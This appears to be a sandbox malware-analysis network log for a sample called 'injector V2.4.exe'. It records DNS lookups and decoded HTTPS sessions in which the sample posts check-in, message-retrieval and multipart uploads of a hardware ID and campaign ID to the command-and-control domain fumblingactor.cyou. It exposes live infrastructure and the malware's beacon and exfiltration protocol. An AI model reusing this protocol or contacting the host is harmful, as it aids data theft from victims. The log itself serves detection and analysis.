                                                                                  Nov 21, 2024 16:52:14.960532904 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.961343050 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.961396933 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.961494923 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.961544037 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.961657047 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.961694002 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.961848021 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.961895943 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.962064981 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.962101936 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.962275028 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.962313890 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.962347031 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.962450027 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.962496996 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.962861061 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:14.963057995 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.963123083 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:14.963155985 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:15.007335901 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:15.007530928 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:15.007607937 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:15.007657051 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:15.055335045 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:15.055497885 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:15.103348970 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:15.297795057 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:17.144680977 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:17.144798040 CET44349716172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:17.144957066 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:17.144994020 CET49716443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:17.165384054 CET49726443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:17.165419102 CET44349726172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:17.165520906 CET49726443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:17.165857077 CET49726443192.168.2.5172.67.219.199
                                                                                  Nov 21, 2024 16:52:17.165884018 CET44349726172.67.219.199192.168.2.5
                                                                                  Nov 21, 2024 16:52:18.362746000 CET49726443192.168.2.5172.67.219.199
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 21, 2024 16:51:58.383491039 CET6359753192.168.2.51.1.1.1
                                                                                  Nov 21, 2024 16:51:58.614809036 CET53635971.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 21, 2024 16:51:58.383491039 CET192.168.2.51.1.1.10x21baStandard query (0)fumblingactor.cyouA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 21, 2024 16:51:58.614809036 CET1.1.1.1192.168.2.50x21baNo error (0)fumblingactor.cyou172.67.219.199A (IP address)IN (0x0001)false
                                                                                  Nov 21, 2024 16:51:58.614809036 CET1.1.1.1192.168.2.50x21baNo error (0)fumblingactor.cyou104.21.24.174A (IP address)IN (0x0001)false
                                                                                  • fumblingactor.cyou
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549710172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:00 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-11-21 15:52:00 UTC990INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=mpvqh02l21ah17p0cinno8jfqb; expires=Mon, 17-Mar-2025 09:38:39 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fa6XHCSa%2F6wXuB5SoeCjA0yoCdzck1xPlxEaMh29JOLrvnb%2FT8WSqHvUZX38B71q3wBogRues4WecsB7ywKg3Cbc68eE5dPsuqkYr7OIQmRjDp5tQoHvkUkBv%2BxPfDeeuerjoqc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d8296fea0f67-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1654390&cwnd=243&unsent_bytes=0&cid=d4595dfc93be0770&ts=737&x=0"
                                                                                  2024-11-21 15:52:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-11-21 15:52:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549711172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:02 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 54
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:02 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--uoaywzyrlsoc&j=
                                                                                  2024-11-21 15:52:02 UTC996INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=cqmdgjomkhd2fvrms8n61k1isp; expires=Mon, 17-Mar-2025 09:38:41 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnTJqy72Bmo4jKp2a%2BiSZnv2htHT9K%2B5uvE%2B3ntnDw25F1I%2Fw4zHjmyu5FltfJBXE4Nrv31hfq4d5UkEyRGppNRpJIbCm%2Fs6HlY6kOV1NHJqz86KyTlcM%2F90wrzqFR8HasBVfbg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d8368e8418fa-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=956&delivery_rate=1661923&cwnd=128&unsent_bytes=0&cid=7f831048ee286126&ts=741&x=0"
                                                                                  2024-11-21 15:52:02 UTC373INData Raw: 34 34 36 63 0d 0a 42 42 64 4a 56 67 46 36 31 34 2f 52 4a 70 43 6c 6f 64 31 64 6c 36 71 4b 6a 69 78 49 4a 73 43 37 72 6b 48 58 67 74 48 63 37 49 5a 2f 4e 54 39 30 4f 30 37 37 72 61 4a 44 73 70 2f 56 72 79 6a 79 68 71 6a 76 53 47 6f 63 70 74 72 43 4d 72 4b 75 38 36 71 42 70 44 35 78 4b 44 70 79 48 2f 75 74 74 46 36 79 6e 2f 71 6d 66 2f 4c 45 71 4c 51 4f 4c 55 79 69 32 73 49 6a 74 75 6d 2b 72 49 44 6c 62 48 73 75 50 6d 51 5a 73 2b 36 39 53 2f 58 41 78 4c 77 33 2b 63 50 6e 35 6b 46 71 43 75 4c 65 31 47 50 74 6f 4a 79 35 6d 4f 64 4a 64 6a 6f 39 49 77 66 37 39 50 4e 44 2f 6f 65 62 2f 7a 7a 79 79 4f 62 6f 53 43 4e 4f 71 4e 50 4b 49 72 50 6f 6f 62 57 4b 37 6d 78 31 4c 54 39 75 45 4b 66 6a 74 30 7a 2b 78 73 36 38 66 37 75 49 37 2f 51 4f 63 67 54 78 36 38 38 79 70
                                                                                  Data Ascii: 446cBBdJVgF614/RJpClod1dl6qKjixIJsC7rkHXgtHc7IZ/NT90O077raJDsp/VryjyhqjvSGocptrCMrKu86qBpD5xKDpyH/uttF6yn/qmf/LEqLQOLUyi2sIjtum+rIDlbHsuPmQZs+69S/XAxLw3+cPn5kFqCuLe1GPtoJy5mOdJdjo9Iwf79PND/oeb/zzyyOboSCNOqNPKIrPoobWK7mx1LT9uEKfjt0z+xs68f7uI7/QOcgTx688yp
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 45 4a 55 65 69 33 73 59 70 75 75 71 33 73 34 50 69 5a 6e 56 72 65 69 4d 66 72 61 33 72 42 4e 48 43 30 37 67 7a 34 34 72 53 72 46 46 6b 58 65 4c 65 77 47 50 74 6f 4c 75 37 6a 65 64 74 65 69 67 38 61 41 71 31 2f 37 56 4a 39 39 58 46 75 6a 48 2f 79 2f 72 6d 51 43 78 48 71 39 4c 46 4a 72 4c 6b 38 2f 44 4f 34 33 34 31 63 33 52 43 46 62 37 68 75 56 50 79 68 39 7a 78 4a 72 58 50 35 4b 77 57 61 6b 43 6a 33 63 30 6e 75 2b 36 33 73 6f 6a 71 61 33 6f 74 50 6d 4d 66 76 2b 57 37 52 66 2f 4d 7a 4c 38 36 2b 4d 7a 75 34 45 38 76 42 4f 79 5a 79 7a 76 31 75 50 4f 51 69 65 64 30 4e 78 34 33 62 52 61 79 2b 2f 4e 62 76 4e 36 44 75 44 4f 31 6b 4b 6a 69 53 79 56 57 6f 38 76 4a 4c 61 66 73 74 72 69 44 35 32 68 31 4c 6a 4e 75 46 72 50 71 73 45 7a 32 78 73 32 7a 4e 66 62 4d 36 36
                                                                                  Data Ascii: EJUei3sYpuuq3s4PiZnVreiMfra3rBNHC07gz44rSrFFkXeLewGPtoLu7jedteig8aAq1/7VJ99XFujH/y/rmQCxHq9LFJrLk8/DO4341c3RCFb7huVPyh9zxJrXP5KwWakCj3c0nu+63sojqa3otPmMfv+W7Rf/MzL86+Mzu4E8vBOyZyzv1uPOQied0Nx43bRay+/NbvN6DuDO1kKjiSyVWo8vJLafstriD52h1LjNuFrPqsEz2xs2zNfbM66
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 71 4e 33 4d 4a 4c 6a 6c 73 4c 6d 4e 36 57 46 2f 4a 54 4e 6e 46 4c 7a 67 74 55 54 31 77 38 61 74 4f 76 7a 45 35 4b 77 41 61 6b 4f 36 6d 5a 52 6a 6d 75 65 6c 76 61 48 6e 64 33 78 72 4b 79 30 42 39 65 71 2f 42 4b 71 48 78 4c 6f 33 2f 73 37 67 37 46 77 76 53 71 6e 59 78 69 57 30 37 62 2b 34 6a 75 56 6d 63 79 63 30 5a 42 2b 6e 2f 37 5a 43 34 4d 32 44 38 58 2f 79 30 4b 69 30 44 68 78 55 74 63 6a 61 59 59 44 6a 76 62 43 4a 38 69 5a 71 5a 53 30 6a 48 37 6d 74 36 77 54 35 78 38 2b 34 4e 2f 50 4d 34 4f 4e 42 49 31 61 6a 31 63 49 78 73 75 43 36 73 49 48 6f 62 33 67 73 4f 57 67 53 75 4f 6d 30 52 62 4b 4a 67 37 67 6e 74 5a 43 6f 32 6c 34 6e 53 49 7a 53 77 43 72 31 2f 2f 32 6e 7a 75 4e 71 4e 58 4e 30 5a 78 53 39 35 37 78 4e 2b 4d 33 4d 74 6a 2f 39 77 65 48 76 54 69 5a
                                                                                  Data Ascii: qN3MJLjlsLmN6WF/JTNnFLzgtUT1w8atOvzE5KwAakO6mZRjmuelvaHnd3xrKy0B9eq/BKqHxLo3/s7g7FwvSqnYxiW07b+4juVmcyc0ZB+n/7ZC4M2D8X/y0Ki0DhxUtcjaYYDjvbCJ8iZqZS0jH7mt6wT5x8+4N/PM4ONBI1aj1cIxsuC6sIHob3gsOWgSuOm0RbKJg7gntZCo2l4nSIzSwCr1//2nzuNqNXN0ZxS957xN+M3Mtj/9weHvTiZ
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 41 79 53 31 66 47 66 74 4b 52 35 4f 7a 4a 30 5a 42 54 31 74 66 4e 49 38 63 76 4c 73 44 6e 38 78 4f 4c 6c 52 53 5a 50 70 74 58 46 4a 72 50 68 74 72 75 50 34 47 70 2f 4c 54 64 67 46 37 72 69 75 77 53 38 68 38 53 6e 66 36 32 49 7a 66 74 46 4a 45 4c 69 78 6f 49 36 39 65 65 2f 2f 74 61 6b 61 6e 77 74 4d 6d 59 55 74 4f 75 37 51 66 72 44 77 72 6b 35 39 73 66 73 36 55 38 6c 51 4b 37 58 78 69 4b 30 37 4c 69 78 68 65 45 6d 4f 32 73 7a 65 31 6a 74 72 59 4a 48 35 4e 44 54 73 33 2f 71 68 76 47 73 53 53 59 45 2b 70 6e 4e 4d 62 2f 71 76 62 75 42 34 57 56 36 4c 44 6c 6c 46 4c 2f 6b 75 30 4c 39 7a 74 47 38 4d 2f 76 50 35 75 42 41 4a 30 36 68 31 49 78 74 39 65 65 72 2f 74 61 6b 53 6e 49 6d 47 6d 67 55 73 71 32 73 43 75 75 48 78 4c 4e 2f 72 59 6a 6b 35 6b 49 6a 52 4b 76 63
                                                                                  Data Ascii: AyS1fGftKR5OzJ0ZBT1tfNI8cvLsDn8xOLlRSZPptXFJrPhtruP4Gp/LTdgF7riuwS8h8Snf62IzftFJELixoI69ee//takanwtMmYUtOu7QfrDwrk59sfs6U8lQK7XxiK07LixheEmO2sze1jtrYJH5NDTs3/qhvGsSSYE+pnNMb/qvbuB4WV6LDllFL/ku0L9ztG8M/vP5uBAJ06h1Ixt9eer/takSnImGmgUsq2sCuuHxLN/rYjk5kIjRKvc
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 4f 6c 74 59 50 6f 4a 6d 70 6c 4c 53 4d 66 75 61 33 72 42 50 54 49 79 72 77 77 39 4d 48 6b 34 55 73 6a 51 61 50 66 79 43 6d 2f 34 4c 57 34 6a 2b 46 73 64 69 6f 2b 61 68 2b 39 36 72 42 57 73 6f 6d 44 75 43 65 31 6b 4b 6a 46 53 54 68 4b 73 70 6e 54 62 61 79 67 74 4c 4c 4f 76 43 5a 78 49 54 74 6e 48 37 6e 72 74 6b 4c 2f 78 73 79 2b 50 2f 72 4d 34 2b 56 49 4b 30 6d 6e 31 4d 67 78 76 2b 75 38 73 6f 66 6f 61 7a 56 6c 64 47 51 41 39 62 58 7a 64 66 2f 4a 7a 62 67 70 74 64 65 6d 39 51 34 74 53 4f 4b 42 6a 43 4b 35 37 37 43 78 6a 65 64 6e 66 7a 6b 6d 62 78 47 39 36 4c 39 50 2f 4d 48 52 75 54 44 38 79 2b 76 6c 53 53 4a 49 71 4e 72 4c 59 2f 75 67 74 4b 62 4f 76 43 5a 57 50 43 52 75 57 4b 71 6a 71 67 54 31 79 34 50 6e 66 2f 33 46 34 4f 5a 4b 4c 55 6d 6c 33 38 55 78 76
                                                                                  Data Ascii: OltYPoJmplLSMfua3rBPTIyrww9MHk4UsjQaPfyCm/4LW4j+Fsdio+ah+96rBWsomDuCe1kKjFSThKspnTbaygtLLOvCZxITtnH7nrtkL/xsy+P/rM4+VIK0mn1Mgxv+u8sofoazVldGQA9bXzdf/Jzbgptdem9Q4tSOKBjCK577CxjednfzkmbxG96L9P/MHRuTD8y+vlSSJIqNrLY/ugtKbOvCZWPCRuWKqjqgT1y4Pnf/3F4OZKLUml38Uxv
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 4c 35 32 70 2b 4c 44 64 73 48 4c 7a 6a 75 6b 75 79 69 59 4f 34 4a 37 57 51 71 4d 31 56 4b 55 69 76 6d 64 4e 74 72 4b 43 30 73 73 36 38 4a 6e 6b 6c 4d 57 4d 53 73 2b 6d 32 51 76 6a 43 77 37 51 38 2b 73 7a 75 36 45 45 71 54 36 76 59 79 69 61 2f 36 37 57 7a 6a 65 4a 67 4e 57 56 30 5a 41 44 31 74 66 4e 6b 36 63 72 50 75 48 2f 71 68 76 47 73 53 53 59 45 2b 70 6e 48 4c 37 48 6e 73 37 4f 4e 37 47 4e 78 49 54 46 6a 45 4b 66 6c 73 30 50 67 31 63 4f 32 4f 76 6e 4c 36 4f 68 49 49 30 4b 68 33 59 78 74 39 65 65 72 2f 74 61 6b 53 33 6b 73 48 57 51 44 39 66 4c 39 58 62 4c 41 7a 2f 39 6e 74 63 6e 6a 35 6b 45 6e 52 36 54 61 78 79 61 2f 34 62 53 32 67 2f 5a 6c 65 69 51 77 59 78 65 7a 36 37 4a 4c 39 4d 44 4b 76 6a 66 79 69 4b 61 73 53 54 49 45 2b 70 6e 69 4a 4c 62 6b 38 36
                                                                                  Data Ascii: L52p+LDdsHLzjukuyiYO4J7WQqM1VKUivmdNtrKC0ss68JnklMWMSs+m2QvjCw7Q8+szu6EEqT6vYyia/67WzjeJgNWV0ZAD1tfNk6crPuH/qhvGsSSYE+pnHL7Hns7ON7GNxITFjEKfls0Pg1cO2OvnL6OhII0Kh3Yxt9eer/takS3ksHWQD9fL9XbLAz/9ntcnj5kEnR6Taxya/4bS2g/ZleiQwYxez67JL9MDKvjfyiKasSTIE+pniJLbk86
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 4c 52 4a 30 61 68 2b 75 2f 4b 56 4a 34 73 43 44 67 48 47 31 30 4b 69 30 44 68 39 48 72 4e 66 4c 4e 61 53 74 6c 4b 69 45 34 33 5a 79 50 44 73 6a 56 76 58 72 38 78 79 68 69 59 4f 37 4c 72 57 51 75 4c 34 56 66 78 66 31 69 5a 34 38 2b 2f 6e 7a 71 4d 36 38 4e 44 74 72 4a 69 4e 41 39 61 71 77 56 75 44 42 77 4b 6b 38 73 76 62 57 79 31 51 6e 51 72 58 49 38 68 32 79 2b 72 36 34 6d 66 55 71 59 43 67 36 62 52 2b 6a 72 66 30 45 2f 59 65 62 68 6e 2b 39 69 4e 65 69 44 6a 49 45 2b 70 6e 35 49 4c 76 75 74 4b 69 66 71 55 46 76 4a 6a 4a 30 43 66 57 6a 38 30 4b 79 6e 35 50 78 66 2f 48 5a 71 4c 51 65 65 42 2f 33 69 70 74 7a 35 2f 2f 39 70 38 37 79 4a 69 31 35 65 69 4d 4b 39 62 58 7a 41 2f 48 56 30 62 6b 38 34 38 75 76 30 6e 41 45 51 36 54 63 79 7a 50 33 7a 72 69 71 69 61 51
                                                                                  Data Ascii: LRJ0ah+u/KVJ4sCDgHG10Ki0Dh9HrNfLNaStlKiE43ZyPDsjVvXr8xyhiYO7LrWQuL4Vfxf1iZ48+/nzqM68NDtrJiNA9aqwVuDBwKk8svbWy1QnQrXI8h2y+r64mfUqYCg6bR+jrf0E/Yebhn+9iNeiDjIE+pn5ILvutKifqUFvJjJ0CfWj80Kyn5Pxf/HZqLQeeB/3iptz5//9p87yJi15eiMK9bXzA/HV0bk848uv0nAEQ6TcyzP3zriqiaQ
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 6e 4d 50 75 71 33 39 42 50 53 48 6d 2b 31 78 74 63 7a 35 72 42 5a 36 46 76 6d 4d 6e 33 54 6c 73 71 7a 77 6c 36 52 77 4e 58 4e 6d 4c 56 69 6e 72 65 73 45 74 63 54 52 72 54 6e 32 33 75 75 72 63 42 52 6a 72 4e 37 4e 4e 61 58 33 76 50 47 67 30 6b 64 4c 46 53 46 67 46 72 76 71 70 56 57 79 69 59 4f 77 66 36 33 78 71 4b 51 4f 46 51 72 69 77 59 78 37 39 64 57 77 73 49 44 6a 63 47 52 6d 45 32 30 66 74 50 75 6a 55 2f 32 49 37 59 6b 65 74 59 61 6f 36 67 35 79 46 75 79 5a 79 44 4c 31 75 4f 50 73 31 62 45 31 49 6e 74 6d 66 46 61 73 72 61 55 45 71 70 57 4e 2f 79 32 31 6b 4b 69 72 54 54 68 57 70 4e 72 61 49 50 4c 65 6a 5a 6d 41 34 32 64 6a 4f 7a 6c 76 4f 62 62 38 75 58 72 4d 30 73 43 78 4d 66 4c 65 2b 61 77 41 61 6b 76 69 67 66 56 6a 2f 61 43 4d 38 4d 37 38 4a 69 31 72
                                                                                  Data Ascii: nMPuq39BPSHm+1xtcz5rBZ6FvmMn3Tlsqzwl6RwNXNmLVinresEtcTRrTn23uurcBRjrN7NNaX3vPGg0kdLFSFgFrvqpVWyiYOwf63xqKQOFQriwYx79dWwsIDjcGRmE20ftPujU/2I7YketYao6g5yFuyZyDL1uOPs1bE1IntmfFasraUEqpWN/y21kKirTThWpNraIPLejZmA42djOzlvObb8uXrM0sCxMfLe+awAakvigfVj/aCM8M78Ji1r
                                                                                  2024-11-21 15:52:02 UTC1369INData Raw: 6e 71 76 6b 6a 4d 2b 66 53 75 4f 4f 57 4b 7a 75 39 59 4b 51 54 73 6d 64 52 6a 37 61 43 65 72 49 6e 30 5a 54 63 48 4d 32 34 55 39 66 4c 39 58 62 4c 52 67 2b 64 73 75 34 6a 36 72 42 5a 71 41 36 48 4c 33 69 57 32 39 72 44 35 73 4e 70 4c 5a 79 77 6b 59 46 71 45 34 4c 64 53 35 38 54 54 75 41 48 4c 35 66 72 72 58 69 6b 47 68 2b 4f 4f 45 71 50 6a 73 37 43 4a 70 43 67 31 4d 33 51 37 57 4a 6a 2f 74 46 54 78 68 65 61 46 66 63 54 65 36 2b 78 41 4c 51 53 39 6c 39 56 6a 6f 36 44 72 37 63 43 6b 64 44 56 7a 64 43 51 57 75 4f 79 77 53 76 48 56 30 62 6b 38 34 38 75 76 30 6e 41 46 54 36 50 4a 77 54 4b 34 35 4b 57 41 73 4d 4e 67 63 43 77 4b 58 53 2b 6b 36 71 4d 47 31 4d 54 56 76 48 2b 37 69 50 43 73 46 6d 70 6a 70 4e 7a 4c 59 2f 75 67 74 2f 37 57 70 45 6c 2b 4b 69 52 75 43
                                                                                  Data Ascii: nqvkjM+fSuOOWKzu9YKQTsmdRj7aCerIn0ZTcHM24U9fL9XbLRg+dsu4j6rBZqA6HL3iW29rD5sNpLZywkYFqE4LdS58TTuAHL5frrXikGh+OOEqPjs7CJpCg1M3Q7WJj/tFTxheaFfcTe6+xALQS9l9Vjo6Dr7cCkdDVzdCQWuOywSvHV0bk848uv0nAFT6PJwTK45KWAsMNgcCwKXS+k6qMG1MTVvH+7iPCsFmpjpNzLY/ugt/7WpEl+KiRuC


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549712172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:04 UTC285OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=J6HYNMF79F9LGP59V7A
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12848
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:04 UTC12848OUTData Raw: 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 36 48 59 4e 4d 46 37 39 46 39 4c 47 50 35 39 56 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f
                                                                                  Data Ascii: --J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="pid"2--J6HYNMF79F9LGP59V7AContent-Disposition: form-data; name="lid"LPnhqo--uo
                                                                                  2024-11-21 15:52:05 UTC991INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=c8bsaud1p7ohoosgk4vc35rcjv; expires=Mon, 17-Mar-2025 09:38:43 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfpyRCzm4ksszKZMHuz%2FuqWSB%2Fs7bhG7Dn2EukbkKzvYvKVbhPlQ8qJHkHFqe1cW8FYRHcVDPMMN5LaPkKM9jQDU81zKI58xxRSvsNyQatEOB4t6rvsB5CuuzVBvxZINHt4A6As%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d8454e47159f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13791&delivery_rate=1814791&cwnd=175&unsent_bytes=0&cid=71005b58846c7365&ts=774&x=0"
                                                                                  2024-11-21 15:52:05 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-21 15:52:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549713172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:06 UTC280OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=BUIRWLP4LYVPBV
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15060
                                                                                  Host: fumblingactor.cyou
